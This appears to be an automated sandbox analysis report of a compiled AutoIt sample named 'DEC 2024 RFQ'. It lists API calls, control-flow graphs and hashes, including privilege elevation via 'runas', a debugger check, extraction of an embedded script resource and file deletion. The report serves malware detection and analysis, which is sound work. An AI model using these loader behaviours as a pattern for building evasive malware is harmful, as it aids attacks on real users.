103470->103471 103471->103469 103599 258ba CloseHandle 103471->103599 103474 9cadd 130 API calls 103473->103474 103475 9df33 103474->103475 103475->103372 103477 8d09a 103476->103477 103478 8d0a5 103476->103478 103479 29b3c 59 API calls 103477->103479 103481 27667 59 API calls 103478->103481 103521 8d17f Mailbox 103478->103521 103479->103478 103480 40db6 Mailbox 59 API calls 103482 8d1c8 103480->103482 103483 8d0c9 103481->103483 103484 8d1d4 103482->103484 103608 257a6 60 API calls Mailbox 103482->103608 103485 27667 59 API calls 103483->103485 103487 29837 84 API calls 103484->103487 103488 8d0d2 103485->103488 103490 8d1ec 103487->103490 103489 29837 84 API calls 103488->103489 103491 8d0de 103489->103491 103492 257f6 67 API calls 103490->103492 103493 2459b 59 API calls 103491->103493 103494 8d1fb 103492->103494 103495 8d0f3 103493->103495 103496 8d1ff GetLastError 103494->103496 103497 8d233 103494->103497 103498 27b2e 59 API calls 103495->103498 103499 8d218 103496->103499 103500 8d25e 103497->103500 103501 8d295 103497->103501 103502 8d126 103498->103502 103511 8d188 Mailbox 103499->103511 103609 258ba CloseHandle 103499->103609 103503 40db6 Mailbox 59 API calls 103500->103503 103505 40db6 Mailbox 59 API calls 103501->103505 103504 8d178 103502->103504 103509 83c37 3 API calls 103502->103509 103508 8d263 103503->103508 103507 29b3c 59 API calls 103504->103507 103506 8d29a 103505->103506 103506->103511 103514 27667 59 API calls 103506->103514 103507->103521 103512 8d274 103508->103512 103515 27667 59 API calls 103508->103515 103513 8d136 103509->103513 103511->103372 103610 9fbce 59 API calls 2 library calls 103512->103610 103513->103504 103516 8d13a 103513->103516 103514->103511 103515->103512 103517 27de1 59 API calls 103516->103517 103519 8d147 103517->103519 103607 83a2a 63 API calls Mailbox 103519->103607 103521->103480 103521->103511 103522 8d150 Mailbox 103522->103504 103524 27667 59 API calls 103523->103524 103525 9c2f4 103524->103525 103526 27667 59 API calls 103525->103526 103527 9c2fc 103526->103527 103528 27667 59 API calls 103527->103528 103529 9c304 103528->103529 103530 29837 84 API calls 103529->103530 103554 9c312 103530->103554 103531 27bcc 59 API calls 103531->103554 103532 27924 59 API calls 103532->103554 103533 9c4fb 103536 9c528 Mailbox 103533->103536 103613 29a3c 59 API calls Mailbox 103533->103613 103534 9c4e2 103539 27cab 59 API calls 103534->103539 103536->103372 103537 9c4fd 103541 27cab 59 API calls 103537->103541 103538 28047 59 API calls 103538->103554 103540 9c4ef 103539->103540 103542 27b2e 59 API calls 103540->103542 103543 9c50c 103541->103543 103542->103533 103545 27b2e 59 API calls 103543->103545 103544 27e4f 59 API calls 103547 9c3a9 CharUpperBuffW 103544->103547 103545->103533 103546 27e4f 59 API calls 103548 9c469 CharUpperBuffW 103546->103548 103611 2843a 68 API calls 103547->103611 103612 2c5a7 69 API calls 2 library calls 103548->103612 103551 29837 84 API calls 103551->103554 103552 27cab 59 API calls 103552->103554 103553 27b2e 59 API calls 103553->103554 103554->103531 103554->103532 103554->103533 103554->103534 103554->103536 103554->103537 103554->103538 103554->103544 103554->103546 103554->103551 103554->103552 103554->103553 103556 87962 103555->103556 103557 40db6 Mailbox 59 API calls 103556->103557 103558 87970 103557->103558 103559 8797e 103558->103559 103560 27667 59 API calls 103558->103560 103559->103372 103560->103559 103614 760c0 103561->103614 103563 7618c 103563->103372 103564->103362 103565->103362 103566->103372 103567->103378 103568->103366 103569->103380 103570->103372 103571->103348 103572->103374 103573->103374 103574->103374 103575->103360 103576->103361 103577->103360 103578->103432 103579->103394 103580->103429 103581->103429 103583 255a2 103582->103583 103584 2557d 103582->103584 103585 27d8c 59 API calls 103583->103585 103584->103583 103588 2558c 103584->103588 103589 8325e 103585->103589 103586 8328d 103586->103464 103590 25ab8 59 API calls 103588->103590 103589->103586 103604 831fa ReadFile SetFilePointerEx 103589->103604 103605 27924 59 API calls 2 library calls 103589->103605 103592 8337e 103590->103592 103593 254d2 61 API calls 103592->103593 103594 8338c 103593->103594 103596 8339c Mailbox 103594->103596 103606 277da 61 API calls Mailbox 103594->103606 103596->103464 103597->103439 103598->103468 103599->103469 103600->103440 103601->103440 103602->103462 103603->103467 103604->103589 103605->103589 103606->103596 103607->103522 103608->103484 103609->103511 103610->103511 103611->103554 103612->103554 103613->103536 103615 760cb 103614->103615 103616 760e8 103614->103616 103615->103616 103618 760ab 59 API calls Mailbox 103615->103618 103616->103563 103618->103615 103619 2107d 103624 2708b 103619->103624 103621 2108c 103622 42d40 __cinit 67 API calls 103621->103622 103623 21096 103622->103623 103625 2709b __ftell_nolock 103624->103625 103626 27667 59 API calls 103625->103626 103627 27151 103626->103627 103628 24706 61 API calls 103627->103628 103629 2715a 103628->103629 103655 4050b 103629->103655 103632 27cab 59 API calls 103633 27173 103632->103633 103634 23f74 59 API calls 103633->103634 103635 27182 103634->103635 103636 27667 59 API calls 103635->103636 103637 2718b 103636->103637 103638 27d8c 59 API calls 103637->103638 103639 27194 RegOpenKeyExW 103638->103639 103640 5e8b1 RegQueryValueExW 103639->103640 103645 271b6 Mailbox 103639->103645 103641 5e943 RegCloseKey 103640->103641 103642 5e8ce 103640->103642 103641->103645 103654 5e955 _wcscat Mailbox __NMSG_WRITE 103641->103654 103643 40db6 Mailbox 59 API calls 103642->103643 103644 5e8e7 103643->103644 103646 2522e 59 API calls 103644->103646 103645->103621 103647 5e8f2 RegQueryValueExW 103646->103647 103649 5e90f 103647->103649 103651 5e929 103647->103651 103648 279f2 59 API calls 103648->103654 103650 27bcc 59 API calls 103649->103650 103650->103651 103651->103641 103652 27de1 59 API calls 103652->103654 103653 23f74 59 API calls 103653->103654 103654->103645 103654->103648 103654->103652 103654->103653 103656 51940 __ftell_nolock 103655->103656 103657 40518 GetFullPathNameW 103656->103657 103658 4053a 103657->103658 103659 27bcc 59 API calls 103658->103659 103660 27165 103659->103660 103660->103632

                                                                                                                      Executed Functions

                                                                                                                      Function 00023B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00023B68
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00023B7A
                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,000E52F8,000E52E0,?,?), ref: 00023BEB
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                        • Part of subcall function 0003092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00023C14,000E52F8,?,?,?), ref: 0003096E
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00023C6F
                                                                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,000D7770,00000010), ref: 0005D281
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,000E52F8,?,?,?), ref: 0005D2B9
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,000D4260,000E52F8,?,?,?), ref: 0005D33F
                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0005D346
                                                                                                                        • Part of subcall function 00023A46: GetSysColorBrush.USER32(0000000F), ref: 00023A50
                                                                                                                        • Part of subcall function 00023A46: LoadCursorW.USER32(00000000,00007F00), ref: 00023A5F
                                                                                                                        • Part of subcall function 00023A46: LoadIconW.USER32(00000063), ref: 00023A76
                                                                                                                        • Part of subcall function 00023A46: LoadIconW.USER32(000000A4), ref: 00023A88
                                                                                                                        • Part of subcall function 00023A46: LoadIconW.USER32(000000A2), ref: 00023A9A
                                                                                                                        • Part of subcall function 00023A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00023AC0
                                                                                                                        • Part of subcall function 00023A46: RegisterClassExW.USER32(?), ref: 00023B16
                                                                                                                        • Part of subcall function 000239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00023A03
                                                                                                                        • Part of subcall function 000239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00023A24
                                                                                                                        • Part of subcall function 000239D5: ShowWindow.USER32(00000000,?,?), ref: 00023A38
                                                                                                                        • Part of subcall function 000239D5: ShowWindow.USER32(00000000,?,?), ref: 00023A41
                                                                                                                        • Part of subcall function 0002434A: _memset.LIBCMT ref: 00024370
                                                                                                                        • Part of subcall function 0002434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00024415
                                                                                                                      Strings
                                                                                                                      • runas, xrefs: 0005D33A
                                                                                                                      • This is a third-party compiled AutoIt script., xrefs: 0005D279
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                      • API String ID: 529118366-3287110873
                                                                                                                      • Opcode ID: 0fac0c13985ebc45d0e732466a61753f595478cc8c78868106c0ad09c9fa2181
                                                                                                                      • Instruction ID: 8af1114b915be1d92a949ee641ec16704efaf558545b207ffe1a9f6ae5e8b13d
                                                                                                                      • Opcode Fuzzy Hash: 0fac0c13985ebc45d0e732466a61753f595478cc8c78868106c0ad09c9fa2181
                                                                                                                      • Instruction Fuzzy Hash: 7A513730D08698AEDF11EBB4FC46AFD7B78AF46705F10446AF615BA162CA784605CB20
                                                                                                                      Function 000249A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 996 249a0-24a00 call 27667 GetVersionExW call 27bcc 1001 24a06 996->1001 1002 24b0b-24b0d 996->1002 1003 24a09-24a0e 1001->1003 1004 5d767-5d773 1002->1004 1006 24b12-24b13 1003->1006 1007 24a14 1003->1007 1005 5d774-5d778 1004->1005 1008 5d77b-5d787 1005->1008 1009 5d77a 1005->1009 1010 24a15-24a4c call 27d2c call 27726 1006->1010 1007->1010 1008->1005 1011 5d789-5d78e 1008->1011 1009->1008 1019 24a52-24a53 1010->1019 1020 5d864-5d867 1010->1020 1011->1003 1013 5d794-5d79b 1011->1013 1013->1004 1015 5d79d 1013->1015 1018 5d7a2-5d7a5 1015->1018 1021 24a93-24aaa GetCurrentProcess IsWow64Process 1018->1021 1022 5d7ab-5d7c9 1018->1022 1019->1018 1023 24a59-24a64 1019->1023 1024 5d880-5d884 1020->1024 1025 5d869 1020->1025 1028 24aaf-24ac0 1021->1028 1029 24aac 1021->1029 1022->1021 1030 5d7cf-5d7d5 1022->1030 1031 24a6a-24a6c 1023->1031 1032 5d7ea-5d7f0 1023->1032 1026 5d886-5d88f 1024->1026 1027 5d86f-5d878 1024->1027 1033 5d86c 1025->1033 1026->1033 1036 5d891-5d894 1026->1036 1027->1024 1037 24ac2-24ad2 call 24b37 1028->1037 1038 24b2b-24b35 GetSystemInfo 1028->1038 1029->1028 1039 5d7d7-5d7da 1030->1039 1040 5d7df-5d7e5 1030->1040 1041 5d805-5d811 1031->1041 1042 24a72-24a75 1031->1042 1034 5d7f2-5d7f5 1032->1034 1035 5d7fa-5d800 1032->1035 1033->1027 1034->1021 1035->1021 1036->1027 1053 24ad4-24ae1 call 24b37 1037->1053 1054 24b1f-24b29 GetSystemInfo 1037->1054 1043 24af8-24b08 1038->1043 1039->1021 1040->1021 1044 5d813-5d816 1041->1044 1045 5d81b-5d821 1041->1045 1047 5d831-5d834 1042->1047 1048 24a7b-24a8a 1042->1048 1044->1021 1045->1021 1047->1021 1050 5d83a-5d84f 1047->1050 1051 24a90 1048->1051 1052 5d826-5d82c 1048->1052 1055 5d851-5d854 1050->1055 1056 5d859-5d85f 1050->1056 1051->1021 1052->1021 1061 24ae3-24ae7 GetNativeSystemInfo 1053->1061 1062 24b18-24b1d 1053->1062 1057 24ae9-24aed 1054->1057 1055->1021 1056->1021 1057->1043 1060 24aef-24af2 FreeLibrary 1057->1060 1060->1043 1061->1057 1062->1061
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 000249CD
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      • GetCurrentProcess.KERNEL32(?,000AFAEC,00000000,00000000,?), ref: 00024A9A
                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00024AA1
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00024AE7
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00024AF2
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00024B23
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00024B2F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986165174-0
                                                                                                                      • Opcode ID: ba0900a2a91685a0985d810cec029b6800a699ed39e270f8f612d505cbe72637
                                                                                                                      • Instruction ID: 129d157a9812fc5fb8e6f784b65412f466d2c85dd253e043c41743569776b28d
                                                                                                                      • Opcode Fuzzy Hash: ba0900a2a91685a0985d810cec029b6800a699ed39e270f8f612d505cbe72637
                                                                                                                      • Instruction Fuzzy Hash: 9591E33198DBD1DEC771CB7894501ABBFF5AF2A301B4449AED0CB93A02D660E50CC75A
                                                                                                                      Function 00024E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1063 24e89-24ea1 CreateStreamOnHGlobal 1064 24ea3-24eba FindResourceExW 1063->1064 1065 24ec1-24ec6 1063->1065 1066 24ec0 1064->1066 1067 5d933-5d942 LoadResource 1064->1067 1066->1065 1067->1066 1068 5d948-5d956 SizeofResource 1067->1068 1068->1066 1069 5d95c-5d967 LockResource 1068->1069 1069->1066 1070 5d96d-5d975 1069->1070 1071 5d979-5d98b 1070->1071 1071->1066
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00024D8E,?,?,00000000,00000000), ref: 00024E99
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00024D8E,?,?,00000000,00000000), ref: 00024EB0
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00024D8E,?,?,00000000,00000000,?,?,?,?,?,?,00024E2F), ref: 0005D937
                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00024D8E,?,?,00000000,00000000,?,?,?,?,?,?,00024E2F), ref: 0005D94C
                                                                                                                      • LockResource.KERNEL32(00024D8E,?,?,00024D8E,?,?,00000000,00000000,?,?,?,?,?,?,00024E2F,00000000), ref: 0005D95F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT
                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                      • Opcode ID: c5eff8b189c4924cecc8d42d2f3ac3aa16a3c8163c1f3cc506a889d156750c2e
                                                                                                                      • Instruction ID: 42cc5ecced8320659d555dc72fdad6922e8fd60ff8ff45e63e343d9f6fdc6c7a
                                                                                                                      • Opcode Fuzzy Hash: c5eff8b189c4924cecc8d42d2f3ac3aa16a3c8163c1f3cc506a889d156750c2e
                                                                                                                      • Instruction Fuzzy Hash: D3115E75240701BFEB218BA5EC88F677BBAFBC6B51F104269F4058A250DB65EC008A60
                                                                                                                      Function 0008445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0005E398), ref: 0008446A
                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0008447B
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008448B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48322524-0
                                                                                                                      • Opcode ID: 8d455b3c7ab02936f2144ba0d8a6b5884688bb0f266583a6441bcd006af5db49
                                                                                                                      • Instruction ID: 4e3dfb740bbd15c23b9aed6bdcfd18a6bc6d202a5e68516c432bb2369ae201b0
                                                                                                                      • Opcode Fuzzy Hash: 8d455b3c7ab02936f2144ba0d8a6b5884688bb0f266583a6441bcd006af5db49
                                                                                                                      • Instruction Fuzzy Hash: 1AE0D8334109026752107B78EC0D5FA7B9CAF06335F100725F875C10E0EBB85D009795
                                                                                                                      Function 000309D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00030A5B
                                                                                                                      • timeGetTime.WINMM ref: 00030D16
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00030E53
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00030E61
                                                                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00030EFA
                                                                                                                      • DestroyWindow.USER32 ref: 00030F06
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00030F20
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00064E83
                                                                                                                      • TranslateMessage.USER32(?), ref: 00065C60
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00065C6E
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00065C82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                      • API String ID: 4212290369-3242690629
                                                                                                                      • Opcode ID: fe01a9f204fdda6871f7d475b0daf9fab2eb4af975dcaa20d5cebe34cb84702b
                                                                                                                      • Instruction ID: d35c440980fd2eefb775f3dc18366f744b6674c02ce58a94173025191475c7d0
                                                                                                                      • Opcode Fuzzy Hash: fe01a9f204fdda6871f7d475b0daf9fab2eb4af975dcaa20d5cebe34cb84702b
                                                                                                                      • Instruction Fuzzy Hash: F4B2F270608B41DFD729DF24C894BAEB7E5BF85304F14491DF58A9B2A2CB75E884CB42
                                                                                                                      Function 00089155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 524 89155-89205 call 51940 call 40db6 call 2522e call 88f5f call 24ee5 call 4354c 537 892b8-892bf call 89734 524->537 538 8920b-89212 call 89734 524->538 543 892c8 537->543 544 892c1-892c3 537->544 538->544 545 89218-892b6 call 440fb call 42dbc call 42d8d call 440fb call 42d8d * 2 538->545 548 892cb-89387 call 24f0b * 8 call 898e3 call 4525b 543->548 546 8952a-8952b 544->546 545->548 549 89548-89558 call 25211 546->549 583 89389-8938b 548->583 584 89390-893ab call 88fa5 548->584 583->546 587 8943d-89449 call 453a6 584->587 588 893b1-893b9 584->588 595 8944b-8945a DeleteFileW 587->595 596 8945f-89463 587->596 589 893bb-893bf 588->589 590 893c1 588->590 592 893c6-893e4 call 24f0b 589->592 590->592 602 8940e-89424 call 88953 call 44863 592->602 603 893e6-893eb 592->603 595->546 598 89469-894f2 call 440bb call 899ea call 88b06 596->598 599 89505-89519 CopyFileW 596->599 601 8952d-89543 DeleteFileW call 898a2 598->601 620 894f4-89503 DeleteFileW 598->620 600 8951b-89528 DeleteFileW 599->600 599->601 600->546 601->549 616 89429-89434 602->616 607 893ee-89401 call 890dd 603->607 617 89403-8940c 607->617 616->588 619 8943a 616->619 617->602 619->587 620->546
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00088F5F: __time64.LIBCMT ref: 00088F69
                                                                                                                        • Part of subcall function 00024EE5: _fseek.LIBCMT ref: 00024EFD
                                                                                                                      • __wsplitpath.LIBCMT ref: 00089234
                                                                                                                        • Part of subcall function 000440FB: __wsplitpath_helper.LIBCMT ref: 0004413B
                                                                                                                      • _wcscpy.LIBCMT ref: 00089247
                                                                                                                      • _wcscat.LIBCMT ref: 0008925A
                                                                                                                      • __wsplitpath.LIBCMT ref: 0008927F
                                                                                                                      • _wcscat.LIBCMT ref: 00089295
                                                                                                                      • _wcscat.LIBCMT ref: 000892A8
                                                                                                                        • Part of subcall function 00088FA5: _memmove.LIBCMT ref: 00088FDE
                                                                                                                        • Part of subcall function 00088FA5: _memmove.LIBCMT ref: 00088FED
                                                                                                                      • _wcscmp.LIBCMT ref: 000891EF
                                                                                                                        • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089824
                                                                                                                        • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089837
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00089452
                                                                                                                      • _wcsncpy.LIBCMT ref: 000894C5
                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 000894FB
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00089511
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00089522
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00089534
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1500180987-0
                                                                                                                      • Opcode ID: c9cafc94ccd2a8b2fd95009ef802fd7699fb697c8c407c6ed47da4941ee0ee45
                                                                                                                      • Instruction ID: af96d938139933fc7fc355a33f9622a0df142a22da71a03dba5cec4dae729fa8
                                                                                                                      • Opcode Fuzzy Hash: c9cafc94ccd2a8b2fd95009ef802fd7699fb697c8c407c6ed47da4941ee0ee45
                                                                                                                      • Instruction Fuzzy Hash: 5CC12EB1D00229AADF21EF95CC85EEEB7BDEF45310F0440A6F609E6152EB709A448F65
                                                                                                                      Function 00023015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00023074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 0002309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000230AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000230CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000230DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 000230F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00023101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
